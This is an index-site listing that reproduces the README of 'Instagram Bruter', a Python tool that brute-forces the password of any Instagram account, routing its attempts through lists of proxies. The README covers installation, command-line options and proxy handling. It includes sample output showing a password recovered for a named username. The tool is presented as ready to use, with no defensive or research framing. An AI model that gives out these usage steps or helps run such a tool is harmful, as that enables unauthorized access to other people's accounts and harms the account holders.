Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/bitwise-01/instagram-
Bruteforce attack for Instagram. Now available as a web app at https://yosemite-app.com
https://github.com/bitwise-01/instagram-
bruteforce hack instagram
Last synced: about 1 month ago
JSON representation
Bruteforce attack for Instagram. Now available as a web app at https://yosemite-app.com
- Host: GitHub
- URL: https://github.com/bitwise-01/instagram-
- Owner: Bitwise-01
- License: mit
- Created: 2017-01-29T12:34:06.000Z (almost 8 years ago)
- Default Branch: master
- Last Pushed: 2024-07-09T19:59:05.000Z (4 months ago)
- Last Synced: 2024-08-11T17:10:16.572Z (3 months ago)
- Topics: bruteforce, hack, instagram
- Language: Python
- Homepage:
- Size: 32.2 MB
- Stars: 4,096
- Watchers: 645
- Forks: 1,760
- Open Issues: 74
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Instagram Bruter
[![Version](https://img.shields.io/badge/Version-3.1.0-green)]()
[![Python](https://img.shields.io/badge/Python-v3.9-yellow)]()
[![Discord](https://img.shields.io/badge/Discord-server-blue)](https://discord.gg/VYRAZg5)
[![Donate](https://img.shields.io/badge/PayPal-donate-orange)](https://www.paypal.me/Msheikh03)This program will brute force any Instagram account you send it its way given a list of proxies.
### NOTICE
~~I'm no longer maintaining this project.~~
### Support
It motivates me to keep updating this program.
> **Bitcoin Wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy
> **PayPal:** https://www.paypal.me/Msheikh03## Requirements
- Python _v3.9_
- proxy list## Install Dependencies
### Install Pipenv
```
pip install pipenv
```### Create environment
Make sure you have Python 3.9 installed
```
pipenv --python 3.9
```### Install Requirements
```
pipenv install
```## Help
```
usage: instagram.py [-h] [-u USERNAME] [-p PASSLIST] [-px PROXYLIST] [--prune PRUNE] [--stats] [-nc] [-m MODE]optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
email or username
-p PASSLIST, --passlist PASSLIST
password list
-px PROXYLIST, --proxylist PROXYLIST
proxy list
--prune PRUNE prune the database
--stats get statistics of the proxies
-nc, --no-color disable colors
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
```## Proxies
The system needs a list of proxies to work. Once uploaded, proxies are saved into a database.
### Upload
Upload a list of proxies into the program. The proxy file must have a format of `ip:port`
`proxies_list.txt`
```
3.238.111.248:80
206.189.59.192:8118
165.22.81.30:34100
176.248.120.70:3128
191.242.178.209:3128
180.92.194.235:80
```To upload a list of proxies a similar syntax must be followed.
```
python instagram.py -px
```### Stats
This gives an insight into the health of the proxies in the database.
```
python instagram.py --stats
```### Prune
This allows the able to get rid of proxies with a score below a given score.
It is recommended that you run the `--stats` and prune the database of proxies
who have a proxy score below `Q1`.```
python instagram.py --prune 0.05
```Pruning is not a requirement because the
the system will automatically learn which proxies perform poorly and stop using them.### Usage
```
python instagram.py -u -p
```### Run
```
[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True
```### Stop
```
[-] Wordlist: passlist.txt
[-] Username: Sami09.1
[-] Password: Sami123
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123
```